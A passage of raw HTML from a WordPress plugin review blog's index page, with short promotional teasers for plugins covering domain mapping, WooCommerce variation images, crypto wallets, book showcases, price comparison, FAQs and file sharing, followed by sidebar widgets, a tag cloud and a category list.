title="Posts by Wordpress Jedi" rel="author">Wordpress Jedi</a> . </small> </p> <div class="clearheader"></div> <p>Those of you who build and optimize landing pages for your products know the importance of investing in decent domain names. Mapping them on a single site is going be easier when you have one of these plugins installed:</p> <p><img class="alignnone size-full wp-image-30840" src="https://www.wpsolver.com/wp-content/uploads/2019/02/26/Multiple-Domain-Mapping-on-Single-Site.jpg" alt="" width="490" height="231" /></p> <p><a href="https://wordpress.org/plugins/multiple-domain-mapping-on-single-site/" rel="nofollow">Multiple Domain Mapping on Single Site</a>: this simple plugin lets you map domains to specific URLs on your blog. You can add as many landing pages as you prefer. The domains will display the content from the specified landing page. <a href="https://www.wpsolver.com/multiple-domain-mapping-plugins/#more-30839" class="more-link">[click to continue…]</a></p> <p class="to_comments"><span class="bracket">{</span> <a href="https://www.wpsolver.com/multiple-domain-mapping-plugins/#comments" rel="nofollow"><span>0</span> comments</a> <span class="bracket">}</span></p> </div> </div> <div class="post_box post-29256 post type-post status-publish format-standard has-post-thumbnail hentry category-wordpress-plugins tag-variation tag-woocommerce" id="post-29256"> <div class="headline_area"> <h2 class="entry-title"><a href="https://www.wpsolver.com/additional-variation-images/" rel="bookmark" title="Permanent link to Additional Variation Images for WooCommerce">Additional Variation Images for WooCommerce</a></h2> </div> <div class="format_text entry-content"> <p class="headline_meta" /> <small>May 15th in <a href="https://www.wpsolver.com/category/wordpress-plugins/" rel="category tag">Wordpress Plugins</a> by <a href="https://www.wpsolver.com/author/wpjedi/" title="Posts by Wordpress Jedi" rel="author">Wordpress Jedi</a> . </small> </p> <div class="clearheader"></div> <p>Every savvy e-commerce webmaster knows the importance of including high quality images on product pages to increase engagement and sales. <a href="https://www.wpsolver.com/go/additionalvariation">Additional Variation Images for WooCommerce</a> is a handy extension that let you add additional images for product variations.</p> <p><img class="alignnone size-full wp-image-29257" src="https://www.wpsolver.com/wp-content/uploads/2018/07/03/Additional-Variation-Images.jpg" alt="" width="470" height="323" /> <a href="https://www.wpsolver.com/additional-variation-images/#more-29256" class="more-link">[click to continue…]</a></p> <p class="to_comments"><span class="bracket">{</span> <a href="https://www.wpsolver.com/additional-variation-images/#comments" rel="nofollow"><span>0</span> comments</a> <span class="bracket">}</span></p> </div> </div> <div class="post_box post-31186 post type-post status-publish format-standard has-post-thumbnail hentry category-plugin-lists category-wordpress-plugins tag-bitcoin tag-wallet" id="post-31186"> <div class="headline_area"> <h2 class="entry-title"><a href="https://www.wpsolver.com/cryptocurrency-wallet-plugins-for-wordpress/" rel="bookmark" title="Permanent link to 3 Cryptocurrency Wallet Plugins for WordPress">3 Cryptocurrency Wallet Plugins for WordPress</a></h2> </div> <div class="format_text entry-content"> <p class="headline_meta" /> <small>May 14th in <a href="https://www.wpsolver.com/category/wordpress-plugins/plugin-lists/" rel="category tag">Plugin Lists</a>, <a href="https://www.wpsolver.com/category/wordpress-plugins/" rel="category tag">Wordpress Plugins</a> by <a href="https://www.wpsolver.com/author/wpjedi/" title="Posts by Wordpress Jedi" rel="author">Wordpress Jedi</a> . </small> </p> <div class="clearheader"></div> <p>In the past few years, we have covered a whole host of plugins that let you add <a href="https://www.wpsolver.com/cryptocurrency-wordpress-plugins/">Bitcoin and other crypto prices and data to your site</a>. These cryptocurrency wallet WordPress plugins let you take your site to the next level by allowing visitors to store and exchange cryptos on your site:</p> <p><img src="https://www.wpsolver.com/wp-content/uploads/2019/04/09/Multi-currency-Crypto-Wallet-Widgets.gif" alt="" width="450" /></p> <p><a href="https://www.wpsolver.com/go/multicurrency">Multi-currency Crypto Wallet and Exchange Widgets</a>: this cryptocurrency wallet plugin not only lets you exchange coins but also allows you to issue your own token. It supports Bitcoin, Ethereum, EOS, and Litecoin.</p> <p> <a href="https://www.wpsolver.com/cryptocurrency-wallet-plugins-for-wordpress/#more-31186" class="more-link">[click to continue…]</a></p> <p class="to_comments"><span class="bracket">{</span> <a href="https://www.wpsolver.com/cryptocurrency-wallet-plugins-for-wordpress/#comments" rel="nofollow"><span>0</span> comments</a> <span class="bracket">}</span></p> </div> </div> <div class="post_box post-28358 post type-post status-publish format-standard has-post-thumbnail hentry category-plugin-lists tag-book-slider tag-showcase" id="post-28358"> <div class="headline_area"> <h2 class="entry-title"><a href="https://www.wpsolver.com/book-showcase-plugins/" rel="bookmark" title="Permanent link to 4 Book Showcase Plugins for WordPress">4 Book Showcase Plugins for WordPress</a></h2> </div> <div class="format_text entry-content"> <p class="headline_meta" /> <small>May 13th in <a href="https://www.wpsolver.com/category/wordpress-plugins/plugin-lists/" rel="category tag">Plugin Lists</a> by <a href="https://www.wpsolver.com/author/wpjedi/" title="Posts by Wordpress Jedi" rel="author">Wordpress Jedi</a> . </small> </p> <div class="clearheader"></div> <p>Plenty of <a href="https://www.wpsolver.com/themes-for-e-book-marketing/">authors and publishers use WordPress</a> to promote their upcoming books. They can even sell publications online and bypass distributor fees. Thanks to these book showcase plugins, you can display your upcoming work on your site in a more attractive fashion:</p> <p><img class="alignnone wp-image-18745" src="https://www.wpsolver.com/wp-content/uploads/2014/09/29/bookshelf.gif" alt="bookshelf" width="400" /></p> <p><a href="https://www.wpsolver.com/go/bookshelfslider" rel="nofollow">Multipurpose Bookshelf Slider</a>: a beautiful slider for showcasing books, magazines, DVDs, and everything in between. Comes with a handy widget and shortcode. <a href="https://www.wpsolver.com/book-showcase-plugins/#more-28358" class="more-link">[click to continue…]</a></p> <p class="to_comments"><span class="bracket">{</span> <a href="https://www.wpsolver.com/book-showcase-plugins/#comments" rel="nofollow"><span>0</span> comments</a> <span class="bracket">}</span></p> </div> </div> <div class="post_box post-30165 post type-post status-publish format-standard has-post-thumbnail hentry category-plugin-lists tag-comparison tag-woocommerce" id="post-30165"> <div class="headline_area"> <h2 class="entry-title"><a href="https://www.wpsolver.com/product-price-comparison-plugins/" rel="bookmark" title="Permanent link to 6 Dynamic Product &#038; Price Comparison Plugins for WooCommerce &#038; WordPress">6 Dynamic Product &#038; Price Comparison Plugins for WooCommerce &#038; WordPress</a></h2> </div> <div class="format_text entry-content"> <p class="headline_meta" /> <small>May 12th in <a href="https://www.wpsolver.com/category/wordpress-plugins/plugin-lists/" rel="category tag">Plugin Lists</a> by <a href="https://www.wpsolver.com/author/wpjedi/" title="Posts by Wordpress Jedi" rel="author">Wordpress Jedi</a> . </small> </p> <div class="clearheader"></div> <p>Plenty of shopping and <a href="https://www.wpsolver.com/plugins-affiliate-managers/">affiliate sites</a> are powered by WordPress and WooCommerce these days. If you run a popular shopping site, you should consider adding product and price comparison functionality to it to help your customers make better decisions. Here are 6 <strong>product &amp; price comparison plugins</strong> you don&#8217;t want to miss:</p> <p><img src="https://www.wpsolver.com/wp-content/uploads/2018/11/12/WooCommerce-Better-Compare.gif" alt="" width="450" /></p> <p><a href="https://www.wpsolver.com/go/woocompare"> WooCommerce Better Compare</a>: allows your customers to easily add and compare products. They can hide similarities and highlight differences to make a decision faster. <a href="https://www.wpsolver.com/product-price-comparison-plugins/#more-30165" class="more-link">[click to continue…]</a></p> <p class="to_comments"><span class="bracket">{</span> <a href="https://www.wpsolver.com/product-price-comparison-plugins/#comments" rel="nofollow"><span>0</span> comments</a> <span class="bracket">}</span></p> </div> </div> <div class="post_box post-29539 post type-post status-publish format-standard has-post-thumbnail hentry category-wordpress-plugins tag-faq tag-premium" id="post-29539"> <div class="headline_area"> <h2 class="entry-title"><a href="https://www.wpsolver.com/candy-faq/" rel="bookmark" title="Permanent link to Candy FAQ WordPress Plugin with Analytics &#038; Instant Search">Candy FAQ WordPress Plugin with Analytics &#038; Instant Search</a></h2> </div> <div class="format_text entry-content"> <p class="headline_meta" /> <small>May 11th in <a href="https://www.wpsolver.com/category/wordpress-plugins/" rel="category tag">Wordpress Plugins</a> by <a href="https://www.wpsolver.com/author/wpjedi/" title="Posts by Wordpress Jedi" rel="author">Wordpress Jedi</a> . </small> </p> <div class="clearheader"></div> <p>All savvy business owners understand the importance of delivering impeccable customer support to grow their business&#8217; reputation and attracting more customers. By creating a comprehensive FAQ section for your products, you will be able better serve existing and future customers. Candy FAQ can help with that.</p> <p><img src="https://www.wpsolver.com/wp-content/uploads/2018/08/13/Candy-FAQ.gif" alt="" width="529" /> <a href="https://www.wpsolver.com/candy-faq/#more-29539" class="more-link">[click to continue…]</a></p> <p class="to_comments"><span class="bracket">{</span> <a href="https://www.wpsolver.com/candy-faq/#comments" rel="nofollow"><span>0</span> comments</a> <span class="bracket">}</span></p> </div> </div> <div class="post_box post-30843 post type-post status-publish format-standard has-post-thumbnail hentry category-wordpress-plugins tag-file-sharing" id="post-30843"> <div class="headline_area"> <h2 class="entry-title"><a href="https://www.wpsolver.com/wp-fsam/" rel="bookmark" title="Permanent link to WP FSAM: File Sharing Plugin for WordPress">WP FSAM: File Sharing Plugin for WordPress</a></h2> </div> <div class="format_text entry-content"> <p class="headline_meta" /> <small>May 10th in <a href="https://www.wpsolver.com/category/wordpress-plugins/" rel="category tag">Wordpress Plugins</a> by <a href="https://www.wpsolver.com/author/wpjedi/" title="Posts by Wordpress Jedi" rel="author">Wordpress Jedi</a> . </small> </p> <div class="clearheader"></div> <p>WordPress makes it easy to make quick changes to your themes and plugins even without a FTP client. Have you ever wanted to upload private files and share them only with specific people? WP FSAM is just the plugin for the job. It allows you to create file categories that can be assigned to the private uploads. These files will be only assigned.</p> <p><img class="alignnone size-full wp-image-30845" src="https://www.wpsolver.com/wp-content/uploads/2019/02/26/wpfsam.jpg" alt="" width="480" height="279" /></p> <p> <a href="https://www.wpsolver.com/wp-fsam/#more-30843" class="more-link">[click to continue…]</a></p> <p class="to_comments"><span class="bracket">{</span> <a href="https://www.wpsolver.com/wp-fsam/#comments" rel="nofollow"><span>0</span> comments</a> <span class="bracket">}</span></p> </div> </div> <div class="prev_next"> <p class="previous"><a href="https://www.wpsolver.com/page/2/" >&larr; Previous Entries</a></p> </div> <div class="breadcrumbs"><a href="https://www.wpsolver.com">WP Solver</a></div> </div> <div id="sidebars"> <div id="sidebar_1" class="sidebar"> <ul class="sidebar_list"> <li class="widget arpw-widget-random" id="arpw-widget-3"><h3>Must See WordPress Plugins &#038; Themes</h3><div class="arpw-random-post "><ul class="arpw-ul"><li class="arpw-li arpw-clearfix"><a href="https://www.wpsolver.com/magicards/" rel="bookmark"><img class="arpw-thumbnail aligncenter" src="https://www.wpsolver.com/wp-content/uploads/2018/03/26/magicards-290x80.jpg" alt="MagiCards: Deck of Cards for WordPress" width="290" height="80"></a><a class="arpw-title" href="https://www.wpsolver.com/magicards/" rel="bookmark">MagiCards: Deck of Cards for WordPress</a></li><li class="arpw-li arpw-clearfix"><a href="https://www.wpsolver.com/woocommerce-ultimate-points-rewards-plugin/" rel="bookmark"><img class="arpw-thumbnail aligncenter" src="https://www.wpsolver.com/wp-content/uploads/2017/08/01/WooCommerce-Ultimate-Points-And-Rewards-Plugin-290x80.jpg" alt="WooCommerce Ultimate Points And Rewards Plugin" width="290" height="80"></a><a class="arpw-title" href="https://www.wpsolver.com/woocommerce-ultimate-points-rewards-plugin/" rel="bookmark">WooCommerce Ultimate Points And Rewards Plugin</a></li><li class="arpw-li arpw-clearfix"><a href="https://www.wpsolver.com/woocommerce-mobile-apps-themes/" rel="bookmark"><img class="arpw-thumbnail aligncenter" src="https://www.wpsolver.com/wp-content/uploads/2018/10/01/ionic-3-App-290x80.jpg" alt="7 Must See WooCommerce Mobile Apps &#038; Themes" width="290" height="80"></a><a class="arpw-title" href="https://www.wpsolver.com/woocommerce-mobile-apps-themes/" rel="bookmark">7 Must See WooCommerce Mobile Apps &#038; Themes</a></li></ul></div><!-- Generated by https://wordpress.org/plugins/advanced-random-posts-widget/ --></li><li class="widget arpw-widget-random" id="arpw-widget-2"><h3>Current Visits: </h3><div class="arpw-random-post "><ul class="arpw-ul"><li class="arpw-li arpw-clearfix"><a class="arpw-title" href="https://www.wpsolver.com/tweet-import-import-twitter-posts-into-wordpress/" rel="bookmark">Tweet Import: Import Twitter Posts Into WordPress</a></li><li class="arpw-li arpw-clearfix"><a class="arpw-title" href="https://www.wpsolver.com/adblock-detector-wordpress-plugins/" rel="bookmark">4 AdBlock Notifier &#038; Detector Plugins</a></li></ul></div><!-- Generated by https://wordpress.org/plugins/advanced-random-posts-widget/ --></li><li class="widget widget_synved_social_follow" id="synved_social_follow-3"><h3>Connect with WP Solver</h3><div><a class="synved-social-button synved-social-button-follow synved-social-size-48 synved-social-resolution-single synved-social-provider-facebook nolightbox" data-provider="facebook" target="_blank" rel="nofollow" title="Follow us on Facebook" href="https://www.facebook.com/wpblackbelt" style="font-size: 0px; width:48px;height:48px;margin:0;margin-bottom:0px;margin-right:0px;"><img alt="Facebook" title="Follow us on Facebook" class="synved-share-image synved-social-image synved-social-image-follow" width="48" height="48" style="display: inline; width:48px;height:48px; margin: 0; padding: 0; border: none; box-shadow: none;" src="https://www.wpsolver.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/96x96/facebook.png" /></a><a class="synved-social-button synved-social-button-follow synved-social-size-48 synved-social-resolution-single synved-social-provider-twitter nolightbox" data-provider="twitter" target="_blank" rel="nofollow" title="Follow us on Twitter" href="http://twitter.com/wpblackbelt" style="font-size: 0px; width:48px;height:48px;margin:0;margin-bottom:0px;margin-right:0px;"><img alt="twitter" title="Follow us on Twitter" class="synved-share-image synved-social-image synved-social-image-follow" width="48" height="48" style="display: inline; width:48px;height:48px; margin: 0; padding: 0; border: none; box-shadow: none;" src="https://www.wpsolver.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/96x96/twitter.png" /></a><a class="synved-social-button synved-social-button-follow synved-social-size-48 synved-social-resolution-single synved-social-provider-google_plus nolightbox" data-provider="google_plus" target="_blank" rel="nofollow" title="Follow us on Google+" href="https://plus.google.com/u/0/b/103662190588257705563/103662190588257705563/posts" style="font-size: 0px; width:48px;height:48px;margin:0;margin-bottom:0px;margin-right:0px;"><img alt="google_plus" title="Follow us on Google+" class="synved-share-image synved-social-image synved-social-image-follow" width="48" height="48" style="display: inline; width:48px;height:48px; margin: 0; padding: 0; border: none; box-shadow: none;" src="https://www.wpsolver.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/96x96/google_plus.png" /></a><a class="synved-social-button synved-social-button-follow synved-social-size-48 synved-social-resolution-single synved-social-provider-pinterest nolightbox" data-provider="pinterest" target="_blank" rel="nofollow" title="Our board on Pinterest" href="http://www.pinterest.com/wpanswers/" style="font-size: 0px; width:48px;height:48px;margin:0;margin-bottom:0px;margin-right:0px;"><img alt="pinterest" title="Our board on Pinterest" class="synved-share-image synved-social-image synved-social-image-follow" width="48" height="48" style="display: inline; width:48px;height:48px; margin: 0; padding: 0; border: none; box-shadow: none;" src="https://www.wpsolver.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/96x96/pinterest.png" /></a><a class="synved-social-button synved-social-button-follow synved-social-size-48 synved-social-resolution-single synved-social-provider-linkedin nolightbox" data-provider="linkedin" target="_blank" rel="nofollow" title="Find us on Linkedin" href="http://www.linkedin.com/in/panah/" style="font-size: 0px; width:48px;height:48px;margin:0;margin-bottom:0px;margin-right:0px;"><img alt="linkedin" title="Find us on Linkedin" class="synved-share-image synved-social-image synved-social-image-follow" width="48" height="48" style="display: inline; width:48px;height:48px; margin: 0; padding: 0; border: none; box-shadow: none;" src="https://www.wpsolver.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/96x96/linkedin.png" /></a><a class="synved-social-button synved-social-button-follow synved-social-size-48 synved-social-resolution-single synved-social-provider-youtube nolightbox" data-provider="youtube" target="_blank" rel="nofollow" title="Find us on YouTube" href="https://www.youtube.com/channel/UCHTMeKGYoQjSmzLQcLyAS4Q" style="font-size: 0px; width:48px;height:48px;margin:0;margin-bottom:0px;"><img alt="youtube" title="Find us on YouTube" class="synved-share-image synved-social-image synved-social-image-follow" width="48" height="48" style="display: inline; width:48px;height:48px; margin: 0; padding: 0; border: none; box-shadow: none;" src="https://www.wpsolver.com/wp-content/plugins/social-media-feather/synved-social/image/social/regular/96x96/youtube.png" /></a></div></li><li class="widget widget_text" id="text-391430666"> <div class="textwidget"><center> <a target="_blank" href="https://www.wpsolver.com/advanced-web-hosts-for-wordpress/" rel="noopener noreferrer"> <img src="https://www.wpsolver.com/wp-content/uploads/2012/05/WordpressHosting.png" border="0" width="232" height="69" /></a> <a href="https://www.wpsolver.com/troubleshooting-fixing-hacked-wordpress-sites/"> <img src="https://www.wpsolver.com/wp-content/uploads/2012/04/security1.png" border="0" width="232" height="69"/></a> <a href="https://www.wpsolver.com/400-essential-wordpress-plugins-roundup/"> <img src="https://www.wpsolver.com/wp-content/uploads/2012/04/plugins.png" border="0" width="232" height="69" /></a><a target="_blank" href="https://www.wpsolver.com/wordpress-seo-toolbox-80-best-seo-plugins/" rel="noopener noreferrer"><img width="232" height="69" src="https://www.wpsolver.com/wp-content/uploads/2012/04/seo.png" border="0"/></a> <a target="_blank" href="https://www.wpsolver.com/best-social-media-wordpress-plugins/" rel="noopener noreferrer"> <img src="https://www.wpsolver.com/wp-content/uploads/2012/04/social.png" border="0" width="232" height="69" /></a> </center></div> </li><li class="widget widget_top-posts" id="top-posts-2"><h3>Trending items</h3><ul> <li> <a href="https://www.wpsolver.com/wordpress-schedule-management-plugins/" class="bump-view" data-bump-view="tp"> 3 Employee Scheduling Plugins for WordPress </a> </li> <li> <a href="https://www.wpsolver.com/gappointments/" class="bump-view" data-bump-view="tp"> gAppointments: Appointment Booking Plugin for Gravity Forms </a> </li> <li> <a href="https://www.wpsolver.com/wordpress-plugins-for-facebook-events/" class="bump-view" data-bump-view="tp"> 5 WordPress Plugins for Facebook Events </a> </li> <li> <a href="https://www.wpsolver.com/additional-variation-images/" class="bump-view" data-bump-view="tp"> Additional Variation Images for WooCommerce </a> </li> <li> <a href="https://www.wpsolver.com/product-price-comparison-plugins/" class="bump-view" data-bump-view="tp"> 6 Dynamic Product &amp; Price Comparison Plugins for WooCommerce &amp; WordPress </a> </li> <li> <a href="https://www.wpsolver.com/epub-plugins-for-wordpress/" class="bump-view" data-bump-view="tp"> 4 Decent EPUB Plugins for WordPress </a> </li> </ul></li><li class="widget widget_text" id="text-391430669"><h3>Find WordPress Jedi on Facebook</h3> <div class="textwidget"><div class="fb-like-box" data-href="https://www.facebook.com/pages/WP-Jedi/112424432105444" data-width="292" data-height="130" data-show-faces="true" data-stream="true" data-header="true"></div></div> </li><li class="widget widget_tag_cloud" id="tag_cloud-2"><h3>Tags</h3><div class="tagcloud"><a href="https://www.wpsolver.com/tag/affiliate/" class="tag-cloud-link tag-link-18 tag-link-position-1" style="font-size: 9.50769230769pt;" aria-label="Affiliate (20 items)">Affiliate</a> <a href="https://www.wpsolver.com/tag/amazon/" class="tag-cloud-link tag-link-287 tag-link-position-2" style="font-size: 8.53846153846pt;" aria-label="amazon (16 items)">amazon</a> <a href="https://www.wpsolver.com/tag/best-themes/" class="tag-cloud-link tag-link-383 tag-link-position-3" style="font-size: 19.3076923077pt;" aria-label="best themes (170 items)">best themes</a> <a href="https://www.wpsolver.com/tag/bitcoin/" class="tag-cloud-link tag-link-885 tag-link-position-4" style="font-size: 12.3076923077pt;" aria-label="bitcoin (37 items)">bitcoin</a> <a href="https://www.wpsolver.com/tag/booking/" class="tag-cloud-link tag-link-1372 tag-link-position-5" style="font-size: 9.07692307692pt;" aria-label="booking (18 items)">booking</a> <a href="https://www.wpsolver.com/tag/books/" class="tag-cloud-link tag-link-29 tag-link-position-6" style="font-size: 8.21538461538pt;" aria-label="Books (15 items)">Books</a> <a href="https://www.wpsolver.com/tag/business/" class="tag-cloud-link tag-link-162 tag-link-position-7" style="font-size: 12.3076923077pt;" aria-label="business (37 items)">business</a> <a href="https://www.wpsolver.com/tag/clone/" class="tag-cloud-link tag-link-221 tag-link-position-8" style="font-size: 9.50769230769pt;" aria-label="clone (20 items)">clone</a> <a href="https://www.wpsolver.com/tag/coupon/" class="tag-cloud-link tag-link-111 tag-link-position-9" style="font-size: 9.29230769231pt;" aria-label="coupon (19 items)">coupon</a> <a href="https://www.wpsolver.com/tag/directory/" class="tag-cloud-link tag-link-306 tag-link-position-10" style="font-size: 9.07692307692pt;" aria-label="directory (18 items)">directory</a> <a href="https://www.wpsolver.com/tag/e-commerce/" class="tag-cloud-link tag-link-341 tag-link-position-11" style="font-size: 10.9076923077pt;" aria-label="e-commerce (27 items)">e-commerce</a> <a href="https://www.wpsolver.com/tag/event/" class="tag-cloud-link tag-link-490 tag-link-position-12" style="font-size: 11.7692307692pt;" aria-label="event (33 items)">event</a> <a href="https://www.wpsolver.com/tag/facebook/" class="tag-cloud-link tag-link-136 tag-link-position-13" style="font-size: 12.7384615385pt;" aria-label="facebook (41 items)">facebook</a> <a href="https://www.wpsolver.com/tag/genesis/" class="tag-cloud-link tag-link-361 tag-link-position-14" style="font-size: 10.1538461538pt;" aria-label="genesis (23 items)">genesis</a> <a href="https://www.wpsolver.com/tag/google/" class="tag-cloud-link tag-link-502 tag-link-position-15" style="font-size: 9.72307692308pt;" aria-label="google (21 items)">google</a> <a href="https://www.wpsolver.com/tag/job-board/" class="tag-cloud-link tag-link-300 tag-link-position-16" style="font-size: 8pt;" aria-label="job board (14 items)">job board</a> <a href="https://www.wpsolver.com/tag/login/" class="tag-cloud-link tag-link-518 tag-link-position-17" style="font-size: 8.21538461538pt;" aria-label="login (15 items)">login</a> <a href="https://www.wpsolver.com/tag/magazine/" class="tag-cloud-link tag-link-15 tag-link-position-18" style="font-size: 10.9076923077pt;" aria-label="Magazine (27 items)">Magazine</a> <a href="https://www.wpsolver.com/tag/mobile/" class="tag-cloud-link tag-link-208 tag-link-position-19" style="font-size: 8.86153846154pt;" aria-label="mobile (17 items)">mobile</a> <a href="https://www.wpsolver.com/tag/news/" class="tag-cloud-link tag-link-41 tag-link-position-20" style="font-size: 10.1538461538pt;" aria-label="News (23 items)">News</a> <a href="https://www.wpsolver.com/tag/pinterest/" class="tag-cloud-link tag-link-630 tag-link-position-21" style="font-size: 10.6923076923pt;" aria-label="pinterest (26 items)">pinterest</a> <a href="https://www.wpsolver.com/tag/plugin/" class="tag-cloud-link tag-link-68 tag-link-position-22" style="font-size: 17.2615384615pt;" aria-label="plugin (108 items)">plugin</a> <a href="https://www.wpsolver.com/tag/plugins/" class="tag-cloud-link tag-link-10 tag-link-position-23" style="font-size: 16.7230769231pt;" aria-label="plugins (97 items)">plugins</a> <a href="https://www.wpsolver.com/tag/premium/" class="tag-cloud-link tag-link-83 tag-link-position-24" style="font-size: 10.9076923077pt;" aria-label="premium (27 items)">premium</a> <a href="https://www.wpsolver.com/tag/premium-themes/" class="tag-cloud-link tag-link-1333 tag-link-position-25" style="font-size: 9.07692307692pt;" aria-label="Premium Themes (18 items)">Premium Themes</a> <a href="https://www.wpsolver.com/tag/real-estate/" class="tag-cloud-link tag-link-180 tag-link-position-26" style="font-size: 12.7384615385pt;" aria-label="real estate (41 items)">real estate</a> <a href="https://www.wpsolver.com/tag/recipe/" class="tag-cloud-link tag-link-891 tag-link-position-27" style="font-size: 9.29230769231pt;" aria-label="recipe (19 items)">recipe</a> <a href="https://www.wpsolver.com/tag/restaurant/" class="tag-cloud-link tag-link-291 tag-link-position-28" style="font-size: 9.07692307692pt;" aria-label="restaurant (18 items)">restaurant</a> <a href="https://www.wpsolver.com/tag/security/" class="tag-cloud-link tag-link-98 tag-link-position-29" style="font-size: 13.8153846154pt;" aria-label="security (52 items)">security</a> <a href="https://www.wpsolver.com/tag/seo/" class="tag-cloud-link tag-link-44 tag-link-position-30" style="font-size: 10.3692307692pt;" aria-label="SEO (24 items)">SEO</a> <a href="https://www.wpsolver.com/tag/social/" class="tag-cloud-link tag-link-433 tag-link-position-31" style="font-size: 11.0153846154pt;" aria-label="social (28 items)">social</a> <a href="https://www.wpsolver.com/tag/social-media/" class="tag-cloud-link tag-link-1339 tag-link-position-32" style="font-size: 13.9230769231pt;" aria-label="Social Media (53 items)">Social Media</a> <a href="https://www.wpsolver.com/tag/theme/" class="tag-cloud-link tag-link-101 tag-link-position-33" style="font-size: 17.5846153846pt;" aria-label="theme (117 items)">theme</a> <a href="https://www.wpsolver.com/tag/themes/" class="tag-cloud-link tag-link-6 tag-link-position-34" style="font-size: 17.8pt;" aria-label="Themes (121 items)">Themes</a> <a href="https://www.wpsolver.com/tag/thesis/" class="tag-cloud-link tag-link-109 tag-link-position-35" style="font-size: 10.1538461538pt;" aria-label="thesis (23 items)">thesis</a> <a href="https://www.wpsolver.com/tag/tips/" class="tag-cloud-link tag-link-9 tag-link-position-36" style="font-size: 9.50769230769pt;" aria-label="tips (20 items)">tips</a> <a href="https://www.wpsolver.com/tag/top-lists/" class="tag-cloud-link tag-link-225 tag-link-position-37" style="font-size: 12.4153846154pt;" aria-label="top lists (38 items)">top lists</a> <a href="https://www.wpsolver.com/tag/top-plugins/" class="tag-cloud-link tag-link-253 tag-link-position-38" style="font-size: 13.7076923077pt;" aria-label="top plugins (50 items)">top plugins</a> <a href="https://www.wpsolver.com/tag/twitter/" class="tag-cloud-link tag-link-30 tag-link-position-39" style="font-size: 13.4923076923pt;" aria-label="Twitter (48 items)">Twitter</a> <a href="https://www.wpsolver.com/tag/video/" class="tag-cloud-link tag-link-313 tag-link-position-40" style="font-size: 9.50769230769pt;" aria-label="video (20 items)">video</a> <a href="https://www.wpsolver.com/tag/viral/" class="tag-cloud-link tag-link-188 tag-link-position-41" style="font-size: 10.4769230769pt;" aria-label="viral (25 items)">viral</a> <a href="https://www.wpsolver.com/tag/visual-composer/" class="tag-cloud-link tag-link-1285 tag-link-position-42" style="font-size: 11.8769230769pt;" aria-label="Visual Composer (34 items)">Visual Composer</a> <a href="https://www.wpsolver.com/tag/woocommerce/" class="tag-cloud-link tag-link-664 tag-link-position-43" style="font-size: 22pt;" aria-label="WooCommerce (298 items)">WooCommerce</a> <a href="https://www.wpsolver.com/tag/wordpress/" class="tag-cloud-link tag-link-35 tag-link-position-44" style="font-size: 17.9076923077pt;" aria-label="Wordpress (126 items)">Wordpress</a> <a href="https://www.wpsolver.com/tag/youtube/" class="tag-cloud-link tag-link-183 tag-link-position-45" style="font-size: 11.3384615385pt;" aria-label="youtube (30 items)">youtube</a></div> </li><li class="widget widget_categories" id="categories-246735981"><h3>Categories</h3> <ul> <li class="cat-item cat-item-659"><a href="https://www.wpsolver.com/category/buddypress-themes/">BuddyPress Themes</a> </li> <li class="cat-item cat-item-959"><a href="https://www.wpsolver.com/category/case-studies/">Case Studies</a> </li> <li class="cat-item cat-item-1949"><a href="https://www.wpsolver.com/category/native-wp-apps/">Native WP Apps</a> </li> <li class="cat-item cat-item-1729"><a href="https://www.wpsolver.com/category/viral/">Viral</a> </li> <li class="cat-item cat-item-7"><a href="https://www.wpsolver.com/category/wordpress-plugins/">Wordpress Plugins</a> <ul class='children'> <li class="cat-item cat-item-67"><a href="https://www.wpsolver.com/category/wordpress-plugins/anti-spam/">Anti-Spam</a> </li> <li class="cat-item cat-item-558"><a href="https://www.wpsolver.com/category/wordpress-plugins/backup-plugins/">Backup Plugins</a> </li> <li class="cat-item cat-item-237"><a href="https://www.wpsolver.com/category/wordpress-plugins/debugging-plug-ins/">Debugging Plug-ins</a> </li> <li class="cat-item cat-item-16"><a href="https://www.wpsolver.com/category/wordpress-plugins/free-plug-ins/">Free Plug-ins</a> </li> <li class="cat-item cat-item-223"><a href="https://www.wpsolver.com/category/wordpress-plugins/hack-prevention/">Hack Prevention</a> </li> <li class="cat-item cat-item-24"><a href="https://www.wpsolver.com/category/wordpress-plugins/photo-plugins/">Photo Plugins</a> </li> <li class="cat-item cat-item-1443"><a href="https://www.wpsolver.com/category/wordpress-plugins/plugin-lists/">Plugin Lists</a> </li> <li class="cat-item cat-item-8"><a href="https://www.wpsolver.com/category/wordpress-plugins/plugin-tips/">Plugin Tips</a> </li> <li class="cat-item cat-item-19"><a href="https://www.wpsolver.com/category/wordpress-plugins/plugins-for-seo/">Plugins For SEO</a> </li> <li class="cat-item cat-item-11"><a href="https://www.wpsolver.com/category/wordpress-plugins/premium-plug-ins/">Premium Plug-ins</a> </li> <li class="cat-item cat-item-548"><a href="https://www.wpsolver.com/category/wordpress-plugins/wp-reviews/">WP Reviews</a> </li> </ul> </li> <li class="cat-item cat-item-3"><a href="https://www.wpsolver.com/category/wordpress-themes/">WordPress Themes</a> <ul class='children'> <li class="cat-item cat-item-246"><a href="https://www.wpsolver.com/category/wordpress-themes/clone-wordpress-themes/">Clone Wordpress Themes</a> </li> <li class="cat-item cat-item-45"><a href="https://www.wpsolver.com/category/wordpress-themes/free-themes/">Free Themes</a> </li> <li class="cat-item cat-item-14"><a href="https://www.wpsolver.com/category/wordpress-themes/magazine-themes/">Magazine Themes</a> </li> <li class="cat-item cat-item-5"><a href="https://www.wpsolver.com/category/wordpress-themes/premium-themes/">Premium Themes</a> </li> <li class="cat-item cat-item-233"><a href="https://www.wpsolver.com/category/wordpress-themes/religious-themes/">Religious Themes</a> </li> <li class="cat-item cat-item-749"><a href="https://www.wpsolver.com/category/wordpress-themes/responsive-themes/">Responsive Themes</a> </li> <li class="cat-item cat-item-407"><a href="https://www.wpsolver.com/category/wordpress-themes/shopping-cart-themes/">Shopping Cart Themes</a> </li> <li class="cat-item cat-item-1442"><a href="https://www.wpsolver.com/category/wordpress-themes/theme-lists/">Theme Lists</a> </li> <li class="cat-item cat-item-179"><a href="https://www.wpsolver.com/category/wordpress-themes/themes-for-businesses/">Themes for Businesses</a> </li> <li class="cat-item cat-item-397"><a href="https://www.wpsolver.com/category/wordpress-themes/themes-for-personal-blogs/">Themes for Personal Blogs</a> </li> <li class="cat-item cat-item-121"><a href="https://www.wpsolver.com/category/wordpress-themes/themes-for-pro-bloggers/">Themes for 